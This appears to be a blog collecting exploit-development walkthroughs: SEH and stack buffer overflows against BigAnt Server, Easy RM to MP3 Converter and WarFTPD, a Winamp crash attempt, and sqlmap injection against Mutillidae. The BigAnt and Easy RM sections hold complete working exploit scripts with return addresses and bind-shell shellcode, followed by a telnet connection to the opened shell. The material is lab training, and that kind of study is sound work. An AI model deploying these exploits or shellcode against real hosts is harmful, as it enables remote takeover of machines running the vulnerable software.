EXPLOIT BIGANT SERVER (SEH PROTECTION)

Hello everyone, today I will discuss how to exploit BigAnt server where in system memory has a protection  called SEH and safeSEH.
Structure Exception Handling (SEH) is a mechanism that is owned by a software and hardware to handle an exception.

Ok, let's begin

1. Install BigAnt server and Ollydbg in windows
Run BigAnt server and open Ollydbg then attach Antserver

2. Next, prepare the fuzzer to attack bigant server

#!/usr/bin/python

import socket
target_address="192.168.43.128"
target_port=6660
#buffer= "USV " + "\x41" * 2500 + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()

3. Run the fuxzzer and look at ollydbg

Application has crashed, we successfully send the trash
then to continue into memory press shift + F9

EIP values changed to 41414141
To see the data that are in memory of the application, right-click on the row stack > Follow in Dump,
so at the memory dump window will appear in the data buffer in memory.

There are several ways to solve the protection seh, and the most popular is  POP, POP, RETN metode.
*you can find and learn that metode in other articles.

4. Then looking for springboard address
We are looking for an address with saved commands pop, pop, retn where that address will be used to overwrite SEH address at application.

I will be looking for the address of the module that is not compiled using the option/safeSEH and IMAGE_DLLCHARACTERISTICS_NO_SEH.
*you can check it using the msfpescan function on backtrack

In here I use vbajet32.dll

From Ollydbg - View - Excecutable Modules, double-click vbajet32.dll
after getting into CPU from vbajet32.dll then right-click - Search For - Sequence of Command
and type POP r32, POP r32, RETN like picture below

we find the address of vbajet32.dll , that is at the offset 0F9A196A.

5. Looking for offset to overwrite SEH
I try to make pattern as much as 2500 byte and add this to fuzzer

After add that pattern to fuzzer then run the fuzzer and see on Ollydbg

*every time you run a fuzzer, we need to restart OllyDbg and BigAnt

press shift + F9 to bypass SEH, so will be displayed like below

record the value from register EIP and check that using pattern_offset.

The conclusion we need 966 byte order to triggers SEH handler.
change the value of fuzzer to be 966 byte.

buffer= "USV "

buffer+= "\x90" * 962
buffer+= "\xcc\xcc\xcc\xcc"
buffer+= "\x41\x41\x41\x41"

buffer+= "\x90" * (2504 - len(buffer))
buffer+= "\r\n\r\n"



In here I will change the four byte buffer to be \xcc before the buffer reaches seh address, which will be overwritten with the value \ x41.

Restart the Ollydbg and bigant server then run the fuzzer once again.
bypass SEH by press shift + F9

buffer value \x41 successfully entered into the SEH handler. So far everything is going according to expectations.

6. Control the CPU
Add the address of vbajet32.dll (0F9A196A) to buffer and set to little endian format

buffer= "USV "

buffer+= "\x90" * 962

buffer+= "\xcc\xcc\xcc\xcc"

buffer+= "\x6A\x19\x9A\x0f"  ==> EIP value written in little endian format

buffer+= "\x90" * (2504 - len(buffer))

buffer+= "\r\n\r\n"

Before run the fuzzer, breakpoint at the SEH address memory.
Restart the Ollydbg and bigant server then run the fuzzer once again.

Process on break right when will access the seh address. Then press shift + F9

looking for space to save the payload.

Right-click on the first address - Follow in Dump - Selection

There are a lot of very large empty address. To direct to the address of the stack required jump of 6 bytes.

Then create shellcode and avoid bad character.

*You can see in the book HARMLESS HACKING author MADA R. PERDANA or other articles.

Finall fuzzer 

#!/usr/bin/python

import socket

target_address="192.168.43.128"

target_port=6660

buffer= "USV "

buffer+= "\x90" * 962

buffer+= "\xeb\x06\x90\x90"    #JMP SHORT 6, nop pading

buffer+= "\x6A\x19\x9A\x0f"   #SEH overwrite

buffer+= "\x90" * 16    #NOP pading before shellcode

buffer+= ("\xda\xd6\xd9\x74\x24\xf4\xbb\xc7\xa4\xea\x06\x33\xc9\xb1\x51\x5f"

"\x31\x5f\x17\x83\xc7\x04\x03\x98\xb7\x08\xf3\xda\xd2\x27\xb1\xca"

"\xda\x47\xb5\xf5\x7d\x33\x26\x2d\x5a\xc8\xf2\x11\x29\xb2\xf9\x11"

"\x2c\xa4\x89\xae\x36\xb1\xd1\x10\x46\x2e\xa4\xdb\x7c\x3b\x36\x35"

"\x4d\xfb\xa0\x65\x2a\x3b\xa6\x72\xf2\x76\x4a\x7d\x36\x6d\xa1\x46"

"\xe2\x56\x62\xcd\xef\x1c\x2d\x09\xf1\xc9\xb4\xda\xfd\x46\xb2\x83"

"\xe1\x59\x2f\x38\x36\xd1\x26\x52\x62\xf9\x59\x69\x5b\xda\xfe\xe6"

"\xdf\xec\x75\xb8\xd3\x87\xfa\x24\x41\x1c\xba\x5c\xc7\x4b\xb5\x12"

"\xf9\x67\x99\x55\xd3\x1e\x49\xcf\xb4\xed\x5f\x67\x32\x61\x92\x28"

"\xe8\x7a\x02\xbe\xdb\x68\x5f\x05\x8c\x8d\x76\x26\xa5\x97\x11\x59"

"\x58\x5f\xdc\x0c\xc9\x62\x1f\x7e\x65\xba\xd6\x8b\xdb\x6b\x16\xa5"

"\x77\xc7\xbb\x1a\x2b\xa4\x68\xdf\x98\xd5\x5f\xb9\x76\x3b\x3c\x23"

"\xd4\xb2\x5d\x3e\xb2\x60\x87\x30\x84\x3e\x47\x66\x60\xd1\xe6\xd3"

"\x8a\x01\x60\x7f\xd9\x8c\x98\x28\xdd\x07\x09\x83\xde\x78\xc6\xce"

"\x68\xff\x5e\x47\x94\x29\x30\x33\x3e\x83\x4e\x6b\x2d\x43\x56\xf2"

"\x94\xed\xcf\xfb\xcf\x5b\x0f\xd3\x96\x09\x8b\xb5\x3e\xad\x3e\xb0"

"\x5a\x5b\x91\x9b\x8d\x50\x98\xfc\xa4\x2c\x12\xe0\x08\x6d\xd7\x4e"

"\x94\x2f\x35\x70\x2b\x9c\xd6\x01\xd6\xe4\x73\xb2\x8c\x7d\xf6\x3a"

"\x61\x6b\x09\xb7\xc2\x6b\x23\x6c\x9c\xc1\x9d\xc3\x73\x8c\x1c\xb2"

"\x22\x05\x4e\xcb\x15\xcd\xdd\xea\x93\xc0\x4d\xf3\x4a\xb6\x8e\xf4"

"\x44\xb8\xa1\x81\xfc\xba\xc1\x51\x66\xbc\x10\x0b\x98\x92\xf5\xd5"

"\xbe\xf1\x75\x7a\xc0\x20\x86\xac")

buffer+= "\x90" * (2504 - len(buffer))

buffer+= "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect=sock.connect((target_address,target_port))

sock.send(buffer)

sock.close()

Run BigAnt server without Ollydbg, run the fuzzer then telnet ip target.

CMIIW

EXPLOIT WINAMP MUSIC PLAYER (SEH)

In this time I try to exploit winamp v 5.572 and make it crash.

From yesterday until now I have not found the right fuzzer to make it crash. 

I tried to create a fuzzer script to build file .swf, and after I run the fuzzer to generate file .swf  I try to run that file on winamp. 

#!/usr/bin/python

buffer="\x41" * 700

file="tets.swf"

file=open(file, "w")

file.write(buffer)

print("sukses gawe file")

file.close()

And what be happens??? Winamp has crashed.

When i run winamp on Ollydbg, I don't see trash that i sent

But i see the difference before and after i run the fuzzer.  Noticed the picture below :

Before

After

Until now i'm still confused and i'll try to exploit this application. TRY HARDER !!!

PRAY FOR ME 

STACK OVERFLOW EASY RM TO MP3 CONVERTER (NON SEH)

In this time i will explore how to exploit Easy RM to Mp3 Converter
You need to know this application is non SEH. You can search meaning of SEH on internet or everywhere.

Ok let's begin

1. Firstly we must have Ollydbg and Easy RM to Mp3 converter to start exploitation

install and run using windows on virtual box

2. Then we need python or something like that to make a fuzzer application to exploit.
I use python to make fuzzer.

i try to type fuzzer like this


#!/usr/bin/python
buffer="http://"+"\x41" * 28000
file="pusing1.ram"
file=open(file, "w")
file.write(buffer)
print("sukses gawe file")
file.close()

it's mean i try to give some waste as much as 2800 and output file is pusing1.ram

save to your directory then run fuzzer on backtrack console

in this case i save that fuzzer on shared folder directory to make easy an acces to this file.

we can see, once fuzzer is run it will generate output. Look picture below there are pusing1.ram as output

3. Run Easy converter on Ollydbg, and load output file 'pusing1.ram' to Easy converter

see what happens in Ollydbg. Cpu register on Ollydbg will display an error / crash

4. After we know that application is crash with 28000 so we generate it using pattern_create.rb. Then copy paste on fuzzer.

5. Rerun the application fuzzer, and see what happens on cpu register. EIP value is change to 326D4831

 then we will calculate in what number he crashes using pattern_offset.rb function

EIP crashes on 5825 and 26105, ESP crashes on 5833 and 26113

I have tried to use 5825 but it not causes crash, then i use 26105 and really the result is crash

buffer="http://"+"\x90" * 26105

buffer+="\xEF\xBE\xAD\xDE"

EIP value change to DEADBEEF

Then i add ESP value to fuzzer

buffer="http://"+"\x90" * 26105

buffer+="\xEF\xBE\xAD\xDE"

buffer+="http://"+"\x90" * (26113-len(buffer))

buffer+="http://"+"\xCC" * (28000-len(buffer)) 

Rerun the application fuzzer, and you will see

Window stack in Ollydbg containing junk data in the form of charachter \xCC.

6. After that according to exploitation strategy we try to find JMP ESP. 

Run the application fuzzer on Ollydbg. On the menu View select submenu Executetable modules

Double click on SHELL32.dll then find to JMP ESP

We'll find address on shell32.dll which containing JMP ESP command.

Address result is 7C9D30D7.  We try to command application fuzzer to change value on EIP register to be address from JMP ESP inside file shell32.dll.

Firstly we must to change that address to little endian format, from 7C9D30D7 to be \xD7\x30\x9D\x7C

then 

So the fuzzer is 

buffer="http://"+"\x90" * 26105

buffer+="\xD7\x30\x9D\x7C"

buffer+="http://"+"\x90" * (26113-len(buffer))

buffer+="http://"+"\xCC" * (28000-len(buffer)) 

Then pairs the breakpoint to memory 7C9D30D7

Run Easy converter using Ollydbg and rerun the fuzzer application. See what happens

On Cpu register we find SHELL32.7C9D30D7 right behind EIP address. Ollydbg prevent access to 7C9D30D7.

7. The last step is generate payload use metasploit framework. Chose Wind32 bind shell then entry some data like picture below, and click generate button

copy paste payload to fuzzer

#!/usr/bin/python

buffer="http://"+"\x90" * 26105

buffer+="\xD7\x30\x9D\x7C"

#buffer+="http://"+"\x90" * (26113-len(buffer))

#buffer+="http://"+"\xCC" * (28000-len(buffer)) 

buffer+="\x90" * 32

buffer+= ("\xdd\xc3\x31\xc9\xd9\x74\x24\xf4\x5b\xb1\x51\xbf\xa1\x1a\xa8\x27"

"\x83\xc3\x04\x31\x7b\x13\x03\xda\x09\x4a\xd2\xe0\x44\x61\x50\xf0"

"\x60\x8a\x94\xff\xf3\xfe\x07\xdb\xd7\x8b\x9d\x1f\x93\xf0\x18\x27"

"\xa2\xe7\xa8\x98\xbc\x7c\xf1\x06\xbc\x69\x47\xcd\x8a\xe6\x59\x3f"

"\xc3\x38\xc0\x13\xa0\x79\x87\x6c\x68\xb3\x65\x73\xa8\xaf\x82\x48"

"\x78\x14\x43\xdb\x65\xdf\xcc\x07\x67\x0b\x94\xcc\x6b\x80\xd2\x8d"

"\x6f\x17\x0e\x32\xbc\x9c\x59\x58\x98\xbe\x38\x63\xd1\x65\xde\xe8"

"\x51\xaa\x94\xae\x59\x41\xda\x32\xcf\xde\x5b\x42\x51\x89\xd5\x1c"

"\x63\xa5\xba\x5f\xad\x53\x68\xf9\x3a\xaf\xbc\x6d\xcc\xbc\xf2\x32"

"\x66\xbc\x23\xa4\x4d\xaf\x38\x0f\x02\xcf\x17\x30\x2b\xca\xfe\x4f"

"\xc6\x1d\xfd\x1a\x73\x1c\xfe\x74\xeb\xf9\x09\x81\x41\xae\xf6\xbf"

"\xc9\x02\x5a\x6c\xbd\xe7\x0f\xd1\x12\x17\x7f\xb3\xfc\xf6\xdc\x5d"

"\xae\x71\x3d\x34\x38\x26\xa4\x46\x7e\x71\x26\x70\xea\x6e\x89\x29"

"\x14\x5e\x41\x75\x47\x71\x7b\x22\x67\x58\x28\x99\x68\xb5\xa7\xc4"

"\xde\xb0\x71\x51\x1e\x6a\xd1\x09\xb4\xc6\x2d\x61\xa7\x81\x36\xf8"

"\x0e\x28\xee\x05\x58\x9e\xef\x29\x03\x4b\x74\xaf\xa4\xe8\x19\xa6"

"\xd0\x85\xb1\xe1\x33\x96\xbb\xf6\x2e\x62\x35\x1a\x9f\xaa\xb6\x70"

"\x1e\x68\x14\x7a\x9d\x41\xf5\x0f\x58\xa2\x52\xa4\x36\xba\xd6\x44"

"\xfb\x2d\xe8\xcd\xb8\xae\xc0\x76\x16\x03\xbc\xd9\xc9\xc9\x3f\x88"

"\xb8\x58\x11\xd5\xeb\x0b\x3c\xf0\x09\x02\x6d\xfd\xc4\xf0\x6d\xfe"

"\xde\xfb\x42\x8b\x76\xf8\xe0\x4f\x1c\xff\x31\x1d\x22\x2f\xd5\xdf"

"\x04\x32\x55\x4c\x4a\x65\x65\xa2")

file="pusing6.ram"

file=open(file, "w")

file.write(buffer)

print("sukses gawe file")

file.close()

Run Easy converter without Ollydbg then open / load the fuzzer file.

Wawwww, Easy converter has crashes

After run the fuzzer application then run telnet to connect into Windows xp systems via port 4444.

You can see what happens....

CMIIW

BUFFER OVERFLOW : WARFTPD (APLICATION NON SEH)

1. Install and run warftd on windows on virtual box

2. Then  make a simple fuzzer using python programming language, save using extension .py save on backtrack.
I saved it on backtrack with name xfuzz.py

fuzzer script :


import socket
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
#buffer = "\x41" * 1000
s. connect (('192.168.43.128' ,21))
data = s. recv (1024)
print ("sending evile data via user comand...")
s. send ('USER '+buffer+'\r\n')
data = s.recv (1024)
s. send ('PASS PASSWORD '+'\r\n')
s. close ()
print ("Finish")

warning : space is very influential in the python language

3.  To run WarFTP server chose propertis-start servise, then the status of WarFTP will be idle.

i'll tried to connenct ftp using nc, if succes yo will see like picture below

then i'l tried to run fuzzer on backtrack console, 

note the WarFTP, if successfully implemented fuzzer and make the application crash, warftp will disappear from the screen by itself.

every time you make fuzzer to warftp, application will be crash and configuration saved to file FtpDaemon.dat.

to re-run warftp server and prevent errors message then delete file FtpDaemon.dat

4. Re-run warftp server and add user dummies via user security properties.

Then run the Ollydbg to debugging Warftp server.

after adding the new user repeat process fuzzer. On this time the application warftd doesn't dispalyed error message.

Then run application warftp via Ollydbg, re-run fuzzer application. 

before fuzzer

after fuzzer

Seen clearly  what is happening in the system registry when the crash occurred.

There are 4 registry of affected fuzzer, that is ESP, EDI, EBP, and EIP

5. Pattern create 

One of the tools in the metasploit that can be used in conducting vulnerability development is pattern_create.

The purpose is to find out the true locations of a string in the data packets transmitted by the fuzzer into the application

using console go to folder /pentest/exploits/framework/tools

to produce as many as a thousand bytes of data run this command

 ./pattern_create.rb 1000 > string_pattern.txt

it will saved as string_pattern.txt

open string_pattern.txt and copy the code then add to xfuzz.py as buffer

then run again fuzzer to warftp application, note the register memory warftp server 

6. Pattern offset

This function to calculate the amount of bytes from the pattern set generated by the application pattern_create.rb

seen that to achieve the EIP register data needed for 485 byte

add this code to script xfuzz.py 

buffer = "\x90" * 485

once more run fuzzer to warftp application, note the register EIP.

we can look that register EIP change to DEADBEEF

TO BE CONTINUE... 

SQL INJECTION BYPASS : MUTILLIDAE

1. First start apache and mysql

2. Open mutillidae with typing on browser localhost/mutillidae

3. Set up proxy your browser to localhost port 8080

4. Open burp suite and set the tartget as localhost

Then look, what happening when we click login button on mutillidae. Burp suite was succesfully intercept mutillidae activity. View picture below :

This is the result of interception, you will see some information such as post request to localhost like username and password format post

5.  Next open sqlmap, and test to know backend database

As result we get some database:

6. We get some database, i tried to get tables from database nowasp

And the result

7. Then i try to get columns on table accounts

result :

8. Finally we get the columns from accounts table, then i'll try to dump the username

as the result :

dump the password

9. Last step i'll go into mysql shell

type #mysql -h [host] -u user -p

I got it !!!






CMIIW